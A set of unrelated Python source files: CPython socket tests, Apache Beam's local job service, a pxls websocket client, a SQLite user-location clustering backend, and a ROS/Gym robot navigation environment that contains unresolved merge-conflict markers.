with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
import grpc
from google.protobuf import text_format
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
This JobService uses a basic local implementation of runner to run the job.
This JobService is not capable of managing job on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._artifact_service = artifact_service.BeamFilesystemArtifactService(
self._staging_dir)
self._artifact_staging_endpoint = None
def create_beam_job(self, preparation_id, job_name, pipeline, options):
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
provision_info = fn_api_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id=preparation_id,
job_name=job_name,
pipeline_options=options,
retrieval_token=self._artifact_service.retrieval_token(
preparation_id)),
self._staging_dir)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint)
def start_grpc_server(self, port=0):
self._server = grpc.server(UnboundedThreadPoolExecutor())
port = self._server.add_insecure_port('localhost:%d' % port)
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='localhost:%d' % port)
self._server.start()
_LOGGER.info('Grpc server started on port %s', port)
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos._is_user_monitoring_info(x) or
monitoring_infos._is_user_distribution_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(self, worker_command_line, control_address, worker_id=None):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(UnboundedThreadPoolExecutor())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor
)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with fn_api_runner.SUBPROCESS_LOCK:
p = subprocess.Popen(
self._worker_command_line,
shell=True,
env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id,
pipeline,
options,
provision_info,
artifact_staging_endpoint):
super(BeamJob, self).__init__(
job_id, provision_info.provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._state_queues = []
self._log_queues = []
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
try:
result = fn_api_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
_LOGGER.exception('Error running pipeline.')
_LOGGER.exception(traceback)
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime('%Y-%m-%d %H:%M:%S.',
time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
|
websocket_client.py
|
import asyncio
import json
import threading
import websockets
import uuid
from utils.log import get_logger
logger = get_logger("pxls_websocket")
class WebsocketClient:
"""A threaded websocket client to update the canvas board and online count
in real-time."""
def __init__(self, uri: str, stats_manager):
self.uri = uri
self.stats = stats_manager
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self._paused = False
self.status = False
def start(self):
"""Start the websocket in a separate thread."""
self.thread.start()
def _start(self):
self.loop.run_until_complete(self._listen())
def pause(self):
"""Pause the websocket."""
self._paused = True
def resume(self):
"""Resume the websocket."""
self._paused = False
async def _listen(self):
while True:
pxls_validate = str(uuid.uuid4())
headers = {"Cookie": f"pxls-validate={pxls_validate}"}
try:
async with websockets.connect(
self.uri, extra_headers=headers
) as websocket:
self.status = True
logger.info("Websocket connected")
async for message in websocket:
while self._paused:
pass
try:
message_json = json.loads(message)
if message_json["type"] == "pixel":
pixels = message_json["pixels"]
for pixel in pixels:
if self.stats.board_array is not None:
self.stats.update_board_pixel(**pixel)
if self.stats.virginmap_array is not None:
self.stats.update_virginmap_pixel(**pixel)
if message_json["type"] == "users":
count = message_json["count"]
self.stats.online_count = count
except Exception:
logger.exception("Websocket client raised")
except Exception as error:
self.status = False
self.stats.online_count = None
logger.debug(f"Websocket disconnected: {error}")
logger.debug("Attempting reconnect...")
await asyncio.sleep(1)
|
locationsDatabase.py
|
import time
import numpy as np
from threading import Thread
import utils
import dbscan
import placesDatabase as placesDB
import userDatabase as userDB
#Distance in meters
minDist = 20
minPoints = 10
#public in database: 0=hidden 1=public for friends, 2=everybody
def storePlacesIdArroundUser(conn, latitude, longitude):
c = conn.cursor()
#Get the points around aprox 110 m each side
maxLat = latitude + 0.001
minLat = latitude - 0.001
maxLng = longitude + 0.001
minLng = longitude - 0.001
timestamp = utils.timeInMillis()
#Update every month (30 days)
pastTS = timestamp - 30* 24 * 60 * 60 * 1000
t = (pastTS, maxLat, minLat, maxLng, minLng)
c.execute("""SELECT id
FROM locations
WHERE timestamp >= ?
AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?""", t)
if(c.fetchone == None):
#Update / get the places in a separate thread
thread = Thread(target = placesDB.getPlacesAtPointFromGMaps, args = (conn, latitude, longitude))
thread.start()
def postUserLocation(conn, name, token, latitude, longitude, public):
#0 = OK, 1 = Wrong user
c = conn.cursor()
if(userDB.authenticateUser(conn, name, token) == False):
return 1
#Store the location
timestamp = utils.timeInMillis()
t = (name.lower(), latitude, longitude, timestamp, public)
c.execute("INSERT INTO locations(user, latitude, longitude, timestamp, public) VALUES (?, ?, ?, ?, ?)", t)
conn.commit()
storePlacesIdArroundUser(conn, latitude, longitude)
return 0
def getUserLocationMap(conn, name, token, latitude, longitude):
#1=Wrong user
userMap = []
c = conn.cursor()
if(userDB.authenticateUser(conn, name, token) == False):
return 1
timestamp = utils.timeInMillis()
#Use just the last 30 minutes of data
pastTS = timestamp - 30 * 60 * 1000
#Get the points around aprox 1,1 km each side
maxLat = latitude + 0.01
minLat = latitude - 0.01
maxLng = longitude + 0.01
minLng = longitude - 0.01
t = (name.lower(), pastTS, maxLat, minLat, maxLng, minLng)
resultPoints = c.execute("""SELECT latitude, longitude,
MAX(timestamp) AS timestamp
FROM locations
WHERE user != ? AND timestamp >= ?
AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
GROUP BY user""", t)
latitudeStr = ''
longitudeStr = ''
for row in resultPoints:
latitudeStr += ' ' + str(row[0])
longitudeStr += ' ' + str(row[1])
m = np.matrix(latitudeStr +';'+longitudeStr)
dbscanResult = dbscan.dbscan(m, minDist, minPoints)
#print('dbscan: \n'+str(dbscanResult)+'\n\n')
for clusterPoint in dbscanResult:
#print(clusterPoint)
#Get the places arround
radius = utils.getRadius(clusterPoint[2])
#TODO Change the radius
deltaRad = 0.0004 * radius #0.00001 = 1.1m
maxLat = clusterPoint[0] + deltaRad
minLat = clusterPoint[0] - deltaRad
maxLng = clusterPoint[1] + deltaRad
minLng = clusterPoint[1] - deltaRad
t = (maxLat, minLat, maxLng, minLng)
placesArround = c.execute("SELECT id, latitude, longitude FROM places WHERE latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?", t)
places = []
for row in placesArround:
#print("\t"+str(row))
place = utils.setUpGMapPlace(row[0], row[1], row[2])
places.append(place)
if len(places) > 0 :
point = utils.setUpPoint(clusterPoint[0], clusterPoint[1], radius, places)
userMap.append(point)
return userMap
def getNumUsersArround(conn, lat, lng, radius, startTimestamp, endTimestamp):
c = conn.cursor()
#1.1m * radius
maxLat = lat + 0.00001 * radius
minLat = lat - 0.00001 * radius
maxLng = lng + 0.00001 * radius
minLng = lng - 0.00001 * radius
t = (startTimestamp, endTimestamp, maxLat, minLat, maxLng, minLng)
users = c.execute("""SELECT user
FROM locations
WHERE timestamp >= ? AND timestamp <= ?
AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
GROUP BY user""", t)
numUsers = 0
for row in users.fetchall():
numUsers += 1
return numUsers
def getUserDistancesTest(conn):
c = conn.cursor()
resultPoints = c.execute("SELECT * FROM locations")
point = resultPoints.fetchone()
for row in resultPoints:
dist = utils.locationDistance(point[2], point[3], row[2], row[3])
print("Distance: " + str(dist))
#DEPRECATED
def getUsersArround(lat, lng, radius, startTimestamp, endTimestamp):
conn = sqlite3.connect('database.db')
conn.execute("PRAGMA foreign_keys = 1")
c = conn.cursor()
#1.1m * radius
maxLat = lat + 0.00001 * radius
minLat = lat - 0.00001 * radius
maxLng = lng + 0.00001 * radius
minLng = lng - 0.00001 * radius
t = (startTimestamp, endTimestamp, maxLat, minLat, maxLng, minLng)
users = c.execute("""SELECT user
FROM locations
WHERE timestamp >= ? AND timestamp <= ?
AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
GROUP BY user""", t)
usersArround = []
for row in users.fetchall():
usersArround.append(row[0])
conn.close()
return usersArround
#getUserDistancesTest()
#map = getUserLocationMap("Javierd", 40.3591933, -3.6855106)
#print(map)
#postUserLocation("tvdh", 40.35141938, -3.68455186, 1504206094638)
|
rl.py
|
<<<<<<< HEAD
if __name__ == "__main__":
import sys
sys.path.append("../")
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
import rospy
import time
import math
import copy
import threading
import random
import numpy as np
from abc import abstractmethod, ABC
from gym import Env, spaces
<<<<<<< HEAD
from geometry_msgs.msg import Twist, Point, Pose
=======
from geometry_msgs.msg import Twist, Point
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
from sensor_msgs.msg import LaserScan
from nav_msgs.msg import Odometry
from gazebo_msgs.msg import ModelStates, ModelState
from gazebo_msgs.srv import SetModelState
from crowdenv.networks import NNModule
from crowdenv.scenarios import Scenarios
from crowdenv.sensor_converter import ObsFilter
from crowdenv.oscillation_detector import OscillationDetect
<<<<<<< HEAD
from crowdenv.display import Visualization
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
class TOPICS(object):
def __init__(self):
self.scan_topic = "/front/scan"
self.reset_service = '/gazebo/reset_world'
self.set_service = '/gazebo/set_model_state'
self.states_topic = "/gazebo/model_states"
self.odom_topic = "odometry/filtered"
self.action_topic = "/jackal_velocity_controller/cmd_vel"
class HasActionObservationSpace(ABC):
@property
@abstractmethod
def observation_space(self) -> spaces.Space:
raise NotImplementedError()
@property
@abstractmethod
def action_space(self) -> spaces.Space:
raise NotImplementedError()
class CrowdENV(Env, HasActionObservationSpace):
def __init__(self,
scenarios_index=0,
collision_threshold=0.22,
<<<<<<< HEAD
target_threshold=0.2,
=======
target_threshold=0.8,
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
step_time=0.1,
max_steps=500,
random_seed=1,
vel_expanded: bool = False, # whether to use the OSC expanded Action Space or not
):
self.seed = random_seed
self.robot_name = "jackal"
self.collision_threshold = collision_threshold
self.target_threshold = target_threshold
self.start = None
self.goal = None
self.step_time = step_time
self.max_steps = max_steps
<<<<<<< HEAD
self.display = Visualization(1)
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
self.vel_threshold = ((0., 1.), (-1., 1.))
self.vel_expanded = vel_expanded
self.scenarios = Scenarios(self.seed)
self.scenarios_index = scenarios_index
self.topics = TOPICS()
self._generate_advertisements()
self.observation_filter = ObsFilter(vel_thr=self.vel_threshold,
vel_expanded=self.vel_expanded)
cells_per_occupancy_grid: int = self.observation_filter.lidar_converter.grid_size_total
num_timesteps: int = 3
self.observation_space_ = spaces.Box(
np.array([-math.pi, 0] + [0]
+ [0] * (num_timesteps * cells_per_occupancy_grid)),
np.array([math.pi, 4] + [self.observation_filter.number_of_actions - 1]
+ [1] * (num_timesteps * cells_per_occupancy_grid))
)
self.action_space_ = spaces.Discrete(self.observation_filter.number_of_actions)
<<<<<<< HEAD
print("DEBUG: action space, observation space")
print(self.action_space)
print(self.observation_space)
# print("crowdenv: {}".format(self.vel_expanded))
=======
# print("DEBUG: action space, observation space")
# print(self.action_space)
# print(self.observation_space)
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
self.trajectory = []
self.position = None
self.velocity = None
self.action = None
self.reward = None
self.scan = None
self.scan_single = None
self.rel_goal = None
self.last_rel_goal = None
self.terminatec = False
self.terminateg = False
self.terminates = False
self.last_time = rospy.get_rostime().to_sec()
self.step_size = 0
self.oscillation_detector = OscillationDetect()
self.total_oscillations = 0
# self.reset()
@property
def observation_space(self) -> spaces.Space:
return self.observation_space_
@property
def action_space(self) -> spaces.Space:
return self.action_space_
def reset(self, scenarios_index=None):
if scenarios_index is not None:
self.scenarios_index = scenarios_index
self.start, self.goal = self.scenarios.choose_scenarios(self.scenarios_index)
self._set_robot_srv()
self.position = None
self.velocity = None
self.action = None
self.reward = None
self.scan = None
self.scan_single = None
self.rel_goal = None
self.last_rel_goal = None
self.terminatec = False
self.terminateg = False
self.terminates = False
self.last_time = rospy.get_rostime().to_sec()
self.step_size = 0
self.total_oscillations = 0
<<<<<<< HEAD
self.display.reset()
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
while (self.position is None) or (self.scan_single is None) or (self.velocity is None):
pass
return self.get_observation()
def render(self, mode='human'):
pass
def _set_robot_srv(self):
state_msg = ModelState()
state_msg.model_name = self.robot_name
state_msg.pose.position.x = self.start[0]
state_msg.pose.position.y = self.start[1]
state_msg.pose.orientation.z = np.sin(self.start[2] / 2)
state_msg.pose.orientation.w = np.cos(self.start[2] / 2)
rospy.wait_for_service(self.topics.set_service)
try:
set_robot = rospy.ServiceProxy(self.topics.set_service, SetModelState)
set_robot(state_msg)
except rospy.ServiceException as err:
print("Service call failed: {}".format(err))
rospy.sleep(0.5)
def _generate_advertisements(self):
self.scan_subscriber = rospy.Subscriber(self.topics.scan_topic, LaserScan, self._scan_callback, queue_size=1)
self.publisher = rospy.Publisher(self.topics.action_topic, Twist, queue_size=10)
